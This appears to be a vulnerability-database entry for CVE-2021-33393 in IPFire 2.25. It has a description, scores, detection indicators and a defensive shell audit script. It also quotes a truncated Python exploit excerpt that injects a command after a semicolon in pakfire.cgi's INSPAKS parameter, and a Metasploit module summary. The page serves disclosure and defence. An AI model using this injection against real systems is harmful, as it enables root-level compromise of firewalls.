CVE-2021-33393
published 2021-06-09
Priority P271 · high · 8.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 58.73% (99.0th percentile)
lfs/backup in IPFire 2.25-core155 does not ensure that /var/ipfire/backup/bin/backup.pl is owned by the root account. It might be owned by an unprivileged account, which could potentially be used to install a Trojan horse backup.pl script that is later executed by root. Similar problems with the ownership/permissions of other files may be present as well.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipfire | ipfire | < 2.25 | 2.25 |
| ipfire | ipfire | — | — |
Detection & IOCs
- Monitor POST requests to /cgi-bin/pakfire.cgi where the INSPAKS parameter contains a semicolon (;), indicating command injection attempts appended to a package name.
- Alert on authenticated POST requests to /cgi-bin/pakfire.cgi with ACTION=install and INSPAKS values containing shell metacharacters (e.g., semicolons).
- Audit ownership and permissions of /var/ipfire/backup/bin/backup.pl; flag if not owned by root, as it may indicate a planted Trojan horse script.
- Detect the exploit's characteristic HTTP headers: presence of both 'Sec-GPC: 1' and 'Authorization: Basic ...' on POST requests to pakfire.cgi may indicate exploit tooling.
- The exploit requires valid credentials (authenticated RCE); unauthenticated access alone is insufficient to trigger the vulnerability. Detection rules should account for the Basic Auth header being present.
- The NVD description notes that similar ownership/permission problems may exist beyond backup.pl; a broader audit of IPFire file ownership is warranted.
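One way to carry out the ownership audit from the list above, as an added example (not code from IPFire or from the sources this page indexes): a POSIX shell function that checks the script and every parent directory, because a root-owned file can still be replaced if an unprivileged account can write to a directory above it. The function name `audit_path`, its arguments and its output labels are this example's own.

```shell
#!/bin/sh
# Added example: audit a root-executed script and its parent directories.
# audit_path FILE [UID] [STOP]
#   UID  - numeric owner expected on every component (default 0 = root)
#   STOP - directory at which the upward walk ends (default /)
# Prints one line per finding; returns 0 if clean, 1 on findings, 2 if missing.
audit_path() {
    path=$1
    want_uid=${2:-0}
    stop=${3:-/}
    rc=0
    while :; do
        # "ls -ldn" prints: mode links uid gid ... (numeric ids, no dereference)
        if ! line=$(ls -ldn "$path" 2>/dev/null); then
            echo "MISSING $path"
            return 2
        fi
        read -r mode _links uid _rest <<EOF
$line
EOF
        if [ "$uid" != "$want_uid" ]; then
            echo "OWNER uid=$uid (expected $want_uid) $path"
            rc=1
        fi
        case $mode in
            l*) ;;                    # symlink mode bits carry no meaning
            ?????w*|????????w*)       # 6th char: group write, 9th: other write
                echo "WRITABLE $mode $path"
                rc=1 ;;
        esac
        if [ "$path" = "$stop" ] || [ "$path" = "/" ] || [ "$path" = "." ]; then
            break
        fi
        path=$(dirname "$path")
    done
    return "$rc"
}

# Run against the path named in the CVE when called with an argument, e.g.
#   sh audit.sh /var/ipfire/backup/bin/backup.pl
if [ "$#" -gt 0 ]; then
    audit_path "$1"
fi
```

The same function can be pointed at any other script that root runs from cron or an init script, which covers the broader audit the NVD description suggests.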
CVSS provenance
nvd · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 9.0 CRITICAL · AV:N/AC:L/Au:S/C:C/I:C/A:C
No detection rules found.
Exploit-DB
IPFire 2.25 - Remote Code Execution (Authenticated)
exploitdb·2021-05-17·CVSS 8.8
---
```python
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393
#!/usr/bin/python3
import requests as R
import sys
import base64
try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]
except:
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    exit(1)
veri = {
    "INSPAKS": f"7zip;{komut
```
Metasploit
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
metasploit
This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/163158/IPFire-2.25-Remote-Code-Execution.html
- https://github.com/MucahitSaratar/ipfire-2-25-auth-rce
- https://github.com/ipfire/ipfire-2.x/commit/6769d909306d7bdc43d64598872126fcf1b217f6
- https://github.com/ipfire/ipfire-2.x/commits/master?since=2021-05-17&until=2021-05-17
2021-06-09
Published